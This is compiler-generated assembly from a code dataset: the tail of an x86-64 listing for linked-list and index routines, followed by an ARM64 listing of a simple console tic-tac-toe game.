Header=BB4_11 Depth=2 movq -32(%rbp), %rax movq 32(%rax), %rax movq %rax, -32(%rbp) jmp LBB4_11 LBB4_13: ## in Loop: Header=BB4_4 Depth=1 movq -32(%rbp), %rax movq 16(%rax), %rax movq 40(%rax), %rax movq %rax, -16(%rbp) movl $1, -60(%rbp) LBB4_14: ## Parent Loop BB4_4 Depth=1 ## => This Inner Loop Header: Depth=2 movq -16(%rbp), %rax movq (%rax), %rax cmpq -80(%rbp), %rax jl LBB4_16 ## %bb.15: ## in Loop: Header=BB4_14 Depth=2 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) movq -16(%rbp), %rax movq 40(%rax), %rax movq %rax, -16(%rbp) jmp LBB4_14 LBB4_16: ## in Loop: Header=BB4_4 Depth=1 movq -16(%rbp), %rax movq 48(%rax), %rax movq %rax, -16(%rbp) movq -48(%rbp), %rax movq 8(%rax), %rcx movq -56(%rbp), %rax movq %rcx, 8(%rax) movq -56(%rbp), %rcx movq -48(%rbp), %rax movq %rcx, 8(%rax) movq -80(%rbp), %rcx movq -40(%rbp), %rax movq %rcx, (%rax) movq -32(%rbp), %rax movl 8(%rax), %ecx subl -60(%rbp), %ecx addl $1, %ecx movq -40(%rbp), %rax movl %ecx, 8(%rax) movq -32(%rbp), %rax movq 24(%rax), %rcx movq -40(%rbp), %rax movq %rcx, 24(%rax) movq -32(%rbp), %rcx movq -40(%rbp), %rax movq %rcx, 32(%rax) movq -40(%rbp), %rcx movq -32(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -40(%rbp), %rcx movq -32(%rbp), %rax movq %rcx, 24(%rax) movl -60(%rbp), %ecx movq -32(%rbp), %rax movl %ecx, 8(%rax) movq -80(%rbp), %rcx movq -24(%rbp), %rax movq %rcx, (%rax) movq -16(%rbp), %rax movq 40(%rax), %rcx movq -24(%rbp), %rax movq %rcx, 40(%rax) movq -16(%rbp), %rcx movq -24(%rbp), %rax movq %rcx, 48(%rax) movq -24(%rbp), %rcx movq -16(%rbp), %rax movq 40(%rax), %rax movq %rcx, 48(%rax) movq -24(%rbp), %rcx movq -16(%rbp), %rax movq %rcx, 40(%rax) jmp LBB4_4 LBB4_17: movq _current(%rip), %rax movq 48(%rax), %rcx movq _current(%rip), %rax movq 40(%rax), %rax movq %rcx, 48(%rax) movq _current(%rip), %rax movq 40(%rax), %rcx movq _current(%rip), %rax movq 48(%rax), %rax movq %rcx, 40(%rax) movq _current(%rip), %rax movq %rax, -16(%rbp) LBB4_18: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax cmpq $0, 32(%rax) jne LBB4_20 ## %bb.19: ## in Loop: Header=BB4_18 Depth=1 movq -16(%rbp), %rax movq 48(%rax), %rax movq %rax, -16(%rbp) jmp LBB4_18 LBB4_20: movq -16(%rbp), %rax movq 32(%rax), %rax movq %rax, -32(%rbp) movq -32(%rbp), %rax movl 8(%rax), %ecx subl $1, %ecx movq -32(%rbp), %rax movl %ecx, 8(%rax) movq -32(%rbp), %rax cmpl $0, 8(%rax) jne LBB4_22 ## %bb.21: movq -32(%rbp), %rax movq 32(%rax), %rcx movq -32(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -32(%rbp), %rax movq 24(%rax), %rcx movq -32(%rbp), %rax movq 32(%rax), %rax movq %rcx, 24(%rax) movq -32(%rbp), %rdi callq _free LBB4_22: movq _current(%rip), %rax movq 48(%rax), %rax movq %rax, -24(%rbp) LBB4_23: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpq $0, -24(%rbp) movb %al, -81(%rbp) ## 1-byte Spill je LBB4_25 ## %bb.24: ## in Loop: Header=BB4_23 Depth=1 movq -24(%rbp), %rax movswl 24(%rax), %eax cmpl $0, %eax setne %al movb %al, -81(%rbp) ## 1-byte Spill LBB4_25: ## in Loop: Header=BB4_23 Depth=1 movb -81(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB4_26 jmp LBB4_27 LBB4_26: ## in Loop: Header=BB4_23 Depth=1 movq -24(%rbp), %rax movq 48(%rax), %rax movq %rax, -24(%rbp) jmp LBB4_23 LBB4_27: movq _current(%rip), %rax movq 16(%rax), %rax movq %rax, -72(%rbp) movq _current(%rip), %rdi callq _free movq -24(%rbp), %rax movq %rax, _current(%rip) movq -72(%rbp), %rax movq %rax, -8(%rbp) LBB4_28: movq -8(%rbp), %rax addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _el_delete ## -- Begin function el_delete .p2align 4, 0x90 _el_delete: ## @el_delete .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp cmpq $0, _index(%rip) jne LBB5_2 ## %bb.1: jmp LBB5_15 LBB5_2: movq _index(%rip), %rax movq %rax, -8(%rbp) movq -8(%rbp), %rax movq (%rax), %rax movq %rax, -24(%rbp) LBB5_3: ## =>This Inner Loop Header: Depth=1 movq -24(%rbp), %rax cmpq $0, 24(%rax) je LBB5_5 ## %bb.4: ## in Loop: Header=BB5_3 Depth=1 movq -24(%rbp), %rax movq 24(%rax), %rax movq %rax, -24(%rbp) jmp LBB5_3 LBB5_5: movq -24(%rbp), %rax movq 16(%rax), %rax movq %rax, -40(%rbp) LBB5_6: ## =>This Inner Loop Header: Depth=1 cmpq $0, -40(%rbp) je LBB5_8 ## %bb.7: ## in Loop: Header=BB5_6 Depth=1 movq -40(%rbp), %rax movq 48(%rax), %rax movq %rax, -48(%rbp) movq -40(%rbp), %rdi callq _free movq -48(%rbp), %rax movq %rax, -40(%rbp) jmp LBB5_6 LBB5_8: jmp LBB5_9 LBB5_9: ## =>This Inner Loop Header: Depth=1 cmpq $0, -24(%rbp) je LBB5_11 ## %bb.10: ## in Loop: Header=BB5_9 Depth=1 movq -24(%rbp), %rax movq 32(%rax), %rax movq %rax, -32(%rbp) movq -24(%rbp), %rdi callq _free movq -32(%rbp), %rax movq %rax, -24(%rbp) jmp LBB5_9 LBB5_11: jmp LBB5_12 LBB5_12: ## =>This Inner Loop Header: Depth=1 cmpq $0, -8(%rbp) je LBB5_14 ## %bb.13: ## in Loop: Header=BB5_12 Depth=1 movq -8(%rbp), %rax movq 8(%rax), %rax movq %rax, -16(%rbp) movq -8(%rbp), %rdi callq _free movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB5_12 LBB5_14: movq $0, _index(%rip) movq $0, _current(%rip) LBB5_15: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _current ## @current .zerofill __DATA,__common,_current,8,3 .zerofill __DATA,__bss,_DU,4,2 ## @DU .zerofill __DATA,__bss,_LB,8,3 ## @LB .zerofill __DATA,__bss,_DT,8,3 ## @DT .zerofill __DATA,__bss,_NLIM,4,2 ## @NLIM .zerofill __DATA,__bss,_index,8,3 ## @index .subsections_via_symbols
the_stack_data/95449843.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] bl _createBoard stur x0, [x29, #-16] mov w8, #88 strb w8, [sp, #23] str wzr, [sp, #16] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-16] bl _gameOver subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_14 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #16] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur x0, [x29, #-16] adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x1, [x8] bl _printBoard ldrsb w10, [sp, #23] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_5 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _puts b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x0, [x8] bl _getInput str x0, [sp, #8] ldr x8, [sp, #8] str x8, [sp, #24] ldr w8, [sp, #24] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 b LBB0_13 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldur x0, [x29, #-16] ldrsb w2, [sp, #23] ldr x1, [sp, #24] bl _placeTurn subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_9 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 b LBB0_13 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 ldrsb w8, [sp, #23] subs w8, w8, #88 cset w8, ne tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 mov w8, #79 strb w8, [sp, #23] b LBB0_12 LBB0_11: ; in Loop: Header=BB0_1 Depth=1 mov w8, #88 strb w8, [sp, #23] b LBB0_12 LBB0_12: ; in Loop: Header=BB0_1 Depth=1 mov w8, #-1 str w8, [sp, #16] b LBB0_13 LBB0_13: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_1 LBB0_14: ldrsb w8, [sp, #23] subs w8, w8, #88 cset w8, ne tbnz w8, #0, LBB0_16 b LBB0_15 LBB0_15: mov w8, #79 strb w8, [sp, #23] b LBB0_17 LBB0_16: mov w8, #88 strb w8, [sp, #23] b LBB0_17 LBB0_17: ldur x0, [x29, #-16] bl _gameOver subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB0_19 b LBB0_18 LBB0_18: ldrsb w10, [sp, #23] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_20 LBB0_19: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _puts b LBB0_20 LBB0_20: ldur x0, [x29, #-16] adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x1, [x8] bl _printBoard ldur x0, [x29, #-16] bl _freeBoard mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _createBoard ; -- Begin function createBoard .p2align 2 _createBoard: ; @createBoard .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _boardMax@PAGE adrp x9, _boardMax@PAGE add x9, x9, _boardMax@PAGEOFF str x9, [sp, #8] ; 8-byte Folded Spill ldrsw x8, [x8, _boardMax@PAGEOFF] lsl x0, x8, #3 bl _malloc stur x0, [x29, #-8] ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] mov x9, sp mov x8, #91 str x8, [x9] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_2: stur wzr, [x29, #-12] b LBB1_3 LBB1_3: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] adrp x9, _boardMax@PAGE ldr w9, [x9, _boardMax@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_8 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldrsw x8, [x8, #4] lsr x0, x8, #0 bl _malloc ldur x8, [x29, #-8] ldursw x9, [x29, #-12] str x0, [x8, x9, lsl #3] ldur x8, [x29, #-8] ldursw x9, [x29, #-12] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] mov x9, sp mov x8, #97 str x8, [x9] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_6: ; in Loop: Header=BB1_3 Depth=1 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_3 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_3 LBB1_8: stur wzr, [x29, #-12] b LBB1_9 LBB1_9: ; =>This Loop Header: Depth=1 ; Child Loop BB1_11 Depth 2 ldur w8, [x29, #-12] adrp x9, _boardMax@PAGE ldr w9, [x9, _boardMax@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_16 b LBB1_10 LBB1_10: ; in Loop: Header=BB1_9 Depth=1 str wzr, [sp, #16] b LBB1_11 LBB1_11: ; Parent Loop BB1_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp, #8] ; 8-byte Folded Reload ldr w8, [sp, #16] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_14 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_11 Depth=2 ldur x8, [x29, #-8] ldursw x9, [x29, #-12] ldr x8, [x8, x9, lsl #3] ldrsw x9, [sp, #16] add x9, x8, x9 mov w8, #32 strb w8, [x9] b LBB1_13 LBB1_13: ; in Loop: Header=BB1_11 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB1_11 LBB1_14: ; in Loop: Header=BB1_9 Depth=1 b LBB1_15 LBB1_15: ; in Loop: Header=BB1_9 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_9 LBB1_16: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _gameOver ; -- Begin function gameOver .p2align 2 _gameOver: ; @gameOver .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 adrp x8, _boardMax@PAGE add x8, x8, _boardMax@PAGEOFF str x8, [sp] ; 8-byte Folded Spill str x0, [sp, #16] str wzr, [sp, #12] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] adrp x9, _boardMax@PAGE ldr w9, [x9, _boardMax@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_8 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #12] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8] ldr x9, [sp, #16] ldrsw x10, [sp, #12] ldr x9, [x9, x10, lsl #3] ldrsb w9, [x9, #1] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_6 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #12] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8] ldr x9, [sp, #16] ldrsw x10, [sp, #12] ldr x9, [x9, x10, lsl #3] ldrsb w9, [x9, #2] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_6 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #12] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8] subs w8, w8, #32 cset w8, eq tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: mov w8, #1 str w8, [sp, #28] b LBB2_35 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 b LBB2_7 LBB2_7: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB2_1 LBB2_8: str wzr, [sp, #12] b LBB2_9 LBB2_9: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp] ; 8-byte Folded Reload ldr w8, [sp, #12] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_16 b LBB2_10 LBB2_10: ; in Loop: Header=BB2_9 Depth=1 ldr x8, [sp, #16] ldr x8, [x8] ldrsw x9, [sp, #12] ldrsb w8, [x8, x9] ldr x9, [sp, #16] ldr x9, [x9, #8] ldrsw x10, [sp, #12] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_14 b LBB2_11 LBB2_11: ; in Loop: Header=BB2_9 Depth=1 ldr x8, [sp, #16] ldr x8, [x8] ldrsw x9, [sp, #12] ldrsb w8, [x8, x9] ldr x9, [sp, #16] ldr x9, [x9, #16] ldrsw x10, [sp, #12] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_14 b LBB2_12 LBB2_12: ; in Loop: Header=BB2_9 Depth=1 ldr x8, [sp, #16] ldr x8, [x8] ldrsw x9, [sp, #12] ldrsb w8, [x8, x9] subs w8, w8, #32 cset w8, eq tbnz w8, #0, LBB2_14 b LBB2_13 LBB2_13: mov w8, #1 str w8, [sp, #28] b LBB2_35 LBB2_14: ; in Loop: Header=BB2_9 Depth=1 b LBB2_15 LBB2_15: ; in Loop: Header=BB2_9 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB2_9 LBB2_16: ldr x8, [sp, #16] ldr x8, [x8] ldrsb w8, [x8] ldr x9, [sp, #16] ldr x9, [x9, #8] ldrsb w9, [x9, #1] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_20 b LBB2_17 LBB2_17: ldr x8, [sp, #16] ldr x8, [x8] ldrsb w8, [x8] ldr x9, [sp, #16] ldr x9, [x9, #16] ldrsb w9, [x9, #2] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_20 b LBB2_18 LBB2_18: ldr x8, [sp, #16] ldr x8, [x8] ldrsb w8, [x8] subs w8, w8, #32 cset w8, eq tbnz w8, #0, LBB2_20 b LBB2_19 LBB2_19: mov w8, #1 str w8, [sp, #28] b LBB2_35 LBB2_20: ldr x8, [sp, #16] ldr x8, [x8] ldrsb w8, [x8, #2] ldr x9, [sp, #16] ldr x9, [x9, #8] ldrsb w9, [x9, #1] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_24 b LBB2_21 LBB2_21: ldr x8, [sp, #16] ldr x8, [x8] ldrsb w8, [x8, #2] ldr x9, [sp, #16] ldr x9, [x9, #16] ldrsb w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_24 b LBB2_22 LBB2_22: ldr x8, [sp, #16] ldr x8, [x8] ldrsb w8, [x8, #2] subs w8, w8, #32 cset w8, eq tbnz w8, #0, LBB2_24 b LBB2_23 LBB2_23: mov w8, #1 str w8, [sp, #28] b LBB2_35 LBB2_24: str wzr, [sp, #12] b LBB2_25 LBB2_25: ; =>This Loop Header: Depth=1 ; Child Loop BB2_27 Depth 2 ldr w8, [sp, #12] adrp x9, _boardMax@PAGE ldr w9, [x9, _boardMax@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_34 b LBB2_26 LBB2_26: ; in Loop: Header=BB2_25 Depth=1 str wzr, [sp, #8] b LBB2_27 LBB2_27: ; Parent Loop BB2_25 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp] ; 8-byte Folded Reload ldr w8, [sp, #8] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_32 b LBB2_28 LBB2_28: ; in Loop: Header=BB2_27 Depth=2 ldr x8, [sp, #16] ldrsw x9, [sp, #12] ldr x8, [x8, x9, lsl #3] ldrsw x9, [sp, #8] ldrsb w8, [x8, x9] subs w8, w8, #32 cset w8, ne tbnz w8, #0, LBB2_30 b LBB2_29 LBB2_29: str wzr, [sp, #28] b LBB2_35 LBB2_30: ; in Loop: Header=BB2_27 Depth=2 b LBB2_31 LBB2_31: ; in Loop: Header=BB2_27 Depth=2 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB2_27 LBB2_32: ; in Loop: Header=BB2_25 Depth=1 b LBB2_33 LBB2_33: ; in Loop: Header=BB2_25 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB2_25 LBB2_34: mov w8, #2 str w8, [sp, #28] b LBB2_35 LBB2_35: ldr w0, [sp, #28] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _printBoard ; -- Begin function printBoard .p2align 2 _printBoard: ; @printBoard .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _boardMax@PAGE add x8, x8, _boardMax@PAGEOFF str x8, [sp, #16] ; 8-byte Folded Spill stur x0, [x29, #-8] stur x1, [x29, #-16] ldur x1, [x29, #-16] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _fputs stur wzr, [x29, #-20] b LBB3_1 LBB3_1: ; =>This Loop Header: Depth=1 ; Child Loop BB3_3 Depth 2 ldur w8, [x29, #-20] adrp x9, _boardMax@PAGE ldr w9, [x9, _boardMax@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_8 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldur x0, [x29, #-16] ldur w8, [x29, #-20] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf str wzr, [sp, #24] b LBB3_3 LBB3_3: ; Parent Loop BB3_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr w8, [sp, #24] ldr w9, [x9, #4] subs w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_6 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_3 Depth=2 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] ldr x8, [x8, x9, lsl #3] ldrsw x9, [sp, #24] ldrsb w10, [x8, x9] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf b LBB3_5 LBB3_5: ; in Loop: Header=BB3_3 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB3_3 LBB3_6: ; in Loop: Header=BB3_1 Depth=1 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] ldr x8, [x8, x9, lsl #3] ldrsw x9, [sp, #24] ldrsb w10, [x8, x9] mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf ldur x1, [x29, #-16] mov w0, #10 bl _fputc b LBB3_7 LBB3_7: ; in Loop: Header=BB3_1 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB3_1 LBB3_8: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _getInput ; -- Begin function getInput .p2align 2 _getInput: ; @getInput .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] adrp x8, l___const.getInput.returnVal@PAGE add x8, x8, l___const.getInput.returnVal@PAGEOFF ldr x9, [x8] sub x8, x29, #8 stur x9, [x29, #-8] sub x10, x29, #17 sturb wzr, [x29, #-17] ldur x0, [x29, #-16] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _fscanf b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-16] bl _fgetc subs w8, w0, #10 cset w8, eq tbnz w8, #0, LBB4_3 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 b LBB4_1 LBB4_3: ldursb w8, [x29, #-17] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_5 b LBB4_4 LBB4_4: ldursb w8, [x29, #-17] subs w8, w8, #65 stur w8, [x29, #-4] b LBB4_5 LBB4_5: ldur w8, [x29, #-8] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB4_7 b LBB4_6 LBB4_6: ldur w8, [x29, #-8] subs w8, w8, #1 stur w8, [x29, #-8] b LBB4_7 LBB4_7: ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB4_11 b LBB4_8 LBB4_8: ldur w8, [x29, #-8] subs w8, w8, #2 cset w8, gt tbnz w8, #0, LBB4_11 b LBB4_9 LBB4_9: ldur w8, [x29, #-4] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB4_11 b LBB4_10 LBB4_10: ldur w8, [x29, #-4] subs w8, w8, #2 cset w8, le tbnz w8, #0, LBB4_12 b LBB4_11 LBB4_11: mov w8, #-1 stur w8, [x29, #-8] stur w8, [x29, #-4] b LBB4_12 LBB4_12: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _placeTurn ; -- Begin function placeTurn .p2align 2 _placeTurn: ; @placeTurn .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stur x1, [sp, #20] str x0, [sp, #8] strb w2, [sp, #7] ldr x8, [sp, #8] ldrsw x9, [sp, #20] ldr x8, [x8, x9, lsl #3] ldrsw x9, [sp, #24] ldrsb w8, [x8, x9] subs w8, w8, #32 cset w8, eq tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: str wzr, [sp, #28] b LBB5_3 LBB5_2: ldrb w8, [sp, #7] ldr x9, [sp, #8] ldrsw x10, [sp, #20] ldr x9, [x9, x10, lsl #3] ldrsw x10, [sp, #24] add x9, x9, x10 strb w8, [x9] mov w8, #1 str w8, [sp, #28] b LBB5_3 LBB5_3: ldr w0, [sp, #28] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _freeBoard ; -- Begin function freeBoard .p2align 2 _freeBoard: ; @freeBoard .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str wzr, [sp, #4] b LBB6_1 LBB6_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] adrp x9, _boardMax@PAGE ldr w9, [x9, _boardMax@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_4 b LBB6_2 LBB6_2: ; in Loop: Header=BB6_1 Depth=1 ldr x8, [sp, #8] ldrsw x9, [sp, #4] ldr x0, [x8, x9, lsl #3] bl _free b LBB6_3 LBB6_3: ; in Loop: Header=BB6_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB6_1 LBB6_4: ldr x0, [sp, #8] bl _free ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__const .globl _boardMax ; @boardMax .p2align 2 _boardMax: .long 3 ; 0x3 .long 3 ; 0x3 .globl _naughtChar ; @naughtChar _naughtChar: .byte 79 ; 0x4f .globl _crossChar ; @crossChar _crossChar: .byte 88 ; 0x58 .globl _emptyChar ; @emptyChar _emptyChar: .byte 32 ; 0x20 .globl _notOver ; @notOver .p2align 2 _notOver: .long 0 ; 0x0 .globl _win ; @win .p2align 2 _win: .long 1 ; 0x1 .globl _draw ; @draw .p2align 2 _draw: .long 2 ; 0x2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "It's %c's turn.\nChoose co-ordinates: " l_.str.1: ; @.str.1 .asciz "Incorrect input, please try again" l_.str.2: ; @.str.2 .asciz "Game over. %c wins.\n" l_.str.3: ; @.str.3 .asciz "Game over. Draw.\n" l_.str.4: ; @.str.4 .asciz "NULL Pointer errror on line %d\nSuspected memory allocation error or file opening error.\n" l_.str.5: ; @.str.5 .asciz " A B C\n" l_.str.6: ; @.str.6 .asciz "%i [" l_.str.7: ; @.str.7 .asciz " %c," l_.str.8: ; @.str.8 .asciz " %c ]" .section __TEXT,__literal8,8byte_literals .p2align 2 ; @__const.getInput.returnVal l___const.getInput.returnVal: .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .section __TEXT,__cstring,cstring_literals l_.str.9: ; @.str.9 .asciz "%c%d" .subsections_via_symbols
